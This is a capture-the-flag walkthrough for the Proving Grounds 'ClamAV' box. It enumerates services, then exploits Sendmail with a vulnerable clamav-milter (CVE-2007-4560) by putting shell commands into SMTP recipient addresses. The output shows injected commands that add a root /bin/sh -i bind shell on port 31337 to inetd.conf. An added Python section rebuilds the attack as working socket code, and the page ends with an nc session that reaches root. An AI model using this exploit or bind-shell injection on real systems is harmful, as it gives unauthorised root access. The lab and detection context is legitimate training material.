ClamAV

Exploitation Guide for ClamAV | Proving Grounds

Last updated 3 years ago

Summary:

This box is easy and straightforward. The mail service (Sendmail fronted by a vulnerable clamav-milter) accepts shell commands in recipient addresses, which gives us RCE as root without any privilege escalation step.

Enumeration

Nmap

PORT    STATE SERVICE     VERSION                                                                                                                                       
22/tcp  open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)

25/tcp  open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.49.180], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 

80/tcp  open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

199/tcp open  smux        Linux SNMP multiplexer

445/tcp open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)

Searchsploit:

A quick searchsploit query for sendmail lists an exploit whose name matches the name of the box: "Sendmail with clamav-milter < 0.91.2 - Remote Command Execution". The Sendmail version itself (8.13.4) is not the target; the clamav-milter sitting behind it is.

┌──(kali㉿kali)-[~/ctf/pg]                                                                                                                                              
└─$ searchsploit sendmail                                                                                                                                           1 ⨯ 
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path                           
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
...                                                                                                                              | unix/local/21884.txt
Sendmail 8.13.5 - Remote Signal Handling (PoC)                                                                                        | linux/dos/2051.py
Sendmail 8.6.9 IDENT - Remote Command Execution                                                                                       | unix/remote/20599.sh
Sendmail 8.9.2 - Headers Prescan Denial of Service                                                                                    | irix/dos/23167.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (1)                                                              | linux/dos/21476.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)                                                              | linux/dos/21477.c
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                                                                       | multiple/remote/4761.pl
...

Exploitation

Mirror the exploit into the working directory with searchsploit -m.

┌──(imtodess㉿deathnote)-[~/…/boxes/pg/clamav/exploit]                                                                                                                  
└─$ searchsploit -m multiple/remote/4761.pl                                                                                                                             
  Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                                                                                              
      URL: https://www.exploit-db.com/exploits/4761                                                                                                                     
     Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl                                                                                                        
File Type: ASCII text, with CRLF line terminators                                                                                                                       
                                                                                                                                                                        
Copied to: /home/kali/oscp/boxes/pg/clamav/exploit/4761.pl 

It is a Perl script that takes the target IP as its only argument. It does not need root on the attacking machine (it only opens a TCP connection to port 25), so the sudo below is incidental. The script talks plain SMTP to Sendmail and supplies two recipient addresses of the form nobody+"|command". clamav-milter < 0.91.2 in black hole mode (CVE-2007-4560) passes the recipient address to popen() unsanitised, so everything after the pipe runs as the milter's user, which here is root. The first recipient appends an inetd entry that serves /bin/sh -i as root on TCP port 31337, the second restarts inetd to activate it. You can see both commands echoed back in the "Recipient ok" replies. On success we can connect to port 31337 and execute commands.

┌──(imtodess㉿deathnote)-[~/…/boxes/pg/clamav/exploit]
└─$ sudo perl 4761.pl 192.168.154.42                                                                                                                              130 ⨯
[sudo] password for imtodess: 
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.154.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Tue, 24 Aug 2021 13:37:10 -0400; (No UCE/UBE) logging access from: [192.168.49.154](FAIL)-[192.168.49.154]
250-localhost.localdomain Hello [192.168.49.154], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 17OHbALb003999 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
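
The SMTP exchange above, rebuilt in Python as an added example (this is not the page's code and not the Perl exploit itself): it builds the same two injected recipients, drives the session in the same order, parses the server replies and checks that every step got the expected code. The server transcript embedded below is constructed from the output shown on this page; the helper names (injected_recipients, build_session, parse_replies, session_ok, accepted_pipe_recipients, run_exploit) are my own. The 31337 port and the nobody local part come from the exploit output.

```python
"""SMTP recipient injection against Sendmail + clamav-milter < 0.91.2.

Added example, not the page's own code. Helper names are assumptions.
"""
import re
import socket

SHELL_PORT = 31337   # port the inetd entry listens on (from the page)
LOCAL_USER = "nobody"  # local part the exploit uses (from the page)


def injected_recipients(shell_port=SHELL_PORT):
    """The two RCPT TO addresses. clamav-milter (black hole mode) hands the
    address to popen(); everything after the leading '|' runs as a shell
    command under the milter's user, root on this box."""
    inetd_line = f"{shell_port} stream tcp nowait root /bin/sh -i"
    return [
        f'{LOCAL_USER}+"|echo \'{inetd_line}\' >> /etc/inetd.conf"',
        f'{LOCAL_USER}+"|/etc/init.d/inetd restart"',
    ]


def build_session(helo_name, recipients):
    """Client commands in the order the exploit sends them. The message body
    is empty (DATA followed directly by '.'), so every command gets a reply."""
    cmds = [f"EHLO {helo_name}", "MAIL FROM:<>"]
    cmds += [f"RCPT TO:<{r}>" for r in recipients]
    cmds += ["DATA", ".", "QUIT"]
    return cmds


_REPLY = re.compile(r"^(\d{3})([ -])(.*)$")


def parse_replies(server_text):
    """Fold multi-line replies ('250-' continuations) into (code, [lines])."""
    replies, buf = [], []
    for line in server_text.splitlines():
        m = _REPLY.match(line)
        if not m:
            continue  # not a reply line (e.g. a wrapped banner fragment)
        code, sep, text = m.groups()
        buf.append(text)
        if sep == " ":  # final line of this reply
            replies.append((int(code), buf))
            buf = []
    return replies


def session_ok(replies, n_recipients):
    """220 greeting, 250 EHLO, 250 MAIL, 250 per RCPT, 354 DATA, 250 queued, 221 QUIT."""
    expected = [220, 250, 250] + [250] * n_recipients + [354, 250, 221]
    return [c for c, _ in replies] == expected


# Greedy '.*' because the injected address itself contains '>>'.
_RCPT_OK = re.compile(r"<(.*)>\.\.\. Recipient ok")


def accepted_pipe_recipients(replies):
    """Defender-side check: accepted recipients carrying a '|' in the address.
    The same pattern appears in sendmail's to=<...> log lines."""
    hits = []
    for code, lines in replies:
        for text in lines:
            m = _RCPT_OK.search(text)
            if code == 250 and m and "|" in m.group(1):
                hits.append(m.group(1))
    return hits


def _read_reply(f):
    """Read one (possibly multi-line) SMTP reply from a socket file object."""
    lines = []
    while True:
        line = f.readline().decode(errors="replace").rstrip("\r\n")
        lines.append(line)
        m = _REPLY.match(line)
        if not m or m.group(2) == " ":  # closed connection or final line
            return "\n".join(lines)


def run_exploit(host, helo_name="attacker", port=25, timeout=10):
    """Drive the session against a live host; returns (replies, success)."""
    recipients = injected_recipients()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        f = sock.makefile("rwb")
        raw = [_read_reply(f)]
        for cmd in build_session(helo_name, recipients):
            f.write((cmd + "\r\n").encode())
            f.flush()
            raw.append(_read_reply(f))
    replies = parse_replies("\n".join(raw))
    return replies, session_ok(replies, len(recipients))


# Constructed from the page's output (banner line rejoined).
SERVER_TRANSCRIPT = """\
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Tue, 24 Aug 2021 13:37:10 -0400; (No UCE/UBE) logging access from: [192.168.49.154](FAIL)-[192.168.49.154]
250-localhost.localdomain Hello [192.168.49.154], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 17OHbALb003999 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
"""

if __name__ == "__main__":
    import sys
    replies, ok = run_exploit(sys.argv[1])
    print("exploit accepted:", ok, accepted_pipe_recipients(replies))
```

Run it as `python3 clamav_milter.py 192.168.154.42` against the box; a True result means the inetd entry was accepted and port 31337 should be listening. The parse_replies/accepted_pipe_recipients pair is also usable on the blue side: any accepted recipient whose address contains a pipe is this injection.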

Now connect to port 31337 with nc. inetd spawns /bin/sh -i as root for every connection, so there is no privilege escalation to do; read the flag from /root/proof.txt.

┌──(imtodess㉿deathnote)-[~/…/boxes/pg/clamav/exploit]
└─$ nc 192.168.154.42 31337
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
cat proof.txt
<Redacted>